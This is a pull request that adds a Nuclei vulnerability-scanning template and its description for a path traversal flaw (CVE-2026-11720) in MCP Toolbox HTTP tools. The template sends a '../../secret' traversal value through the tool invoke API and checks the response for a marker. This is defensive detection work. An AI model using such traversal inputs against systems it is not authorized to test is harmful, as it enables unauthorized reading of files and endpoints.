### PR TITLE
Add CVE-2026-11720 MCP Toolbox HTTP tool path traversal

### DIFF
--- a/http/cves/2026/CVE-2026-11720.yaml
+++ b/http/cves/2026/CVE-2026-11720.yaml
@@ -1,0 +1,37 @@
+id: CVE-2026-11720
+
+info:
+  name: Google MCP Toolbox HTTP Tool Path Traversal
+  author: str4k3r
+  severity: critical
+  description: |
+    Detects MCP Toolbox HTTP tools that allow a path parameter to escape the
+    configured HTTP source base path and access an unintended downstream path.
+  reference:
+    - https://nvd.nist.gov/vuln/detail/CVE-2026-11720
+    - https://github.com/googleapis/mcp-toolbox/blob/v1.3.0/CHANGELOG.md
+  classification:
+    cve-id: CVE-2026-11720
+    cwe-id: CWE-22
+  metadata:
+    max-request: 1
+    verified: true
+  tags: cve,cve2026,mcp,toolbox,path-traversal
+
+http:
+  - method: POST
+    path:
+      - "{{BaseURL}}/api/tool/{{tool_name}}/invoke"
+    headers:
+      Content-Type: application/json
+    body: '{"pathParam":"{{path_param}}"}'
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '{{marker}}'
+
+variables:
+  tool_name: "path-read"
+  path_param: "../../secret"
+  marker: "path-traversal-reached"


### PR DESCRIPTION
## Vulnerability
MCP Toolbox 1.2.0 does not constrain an HTTP tool path parameter to its configured base path. Traversal sequences can escape the intended directory; version 1.3.0 normalizes and rejects the escape.

## Template behavior
The template invokes the configured HTTP tool with a traversal path and matches a caller-supplied marker from the resulting response. The request is made through the normal `/api/tool/<name>/invoke` API.

## Required configuration
Set `tool_name` to a configured path-reading HTTP tool, `path_param` to a traversal path that reaches a benign marker resource, and `marker` to text present only in that resource. Use a disposable operator-controlled target.

## Impact
An attacker may read files or endpoints outside the tool’s configured base path.

## Usage
```bash
nuclei -u <authorized-toolbox> -t http/cves/2026/CVE-2026-11720.yaml -var tool_name=<http-tool> -var path_param=<traversal-path> -var marker=<expected-marker>
```

Run this template only against systems and test accounts you own or are explicitly authorized to assess.
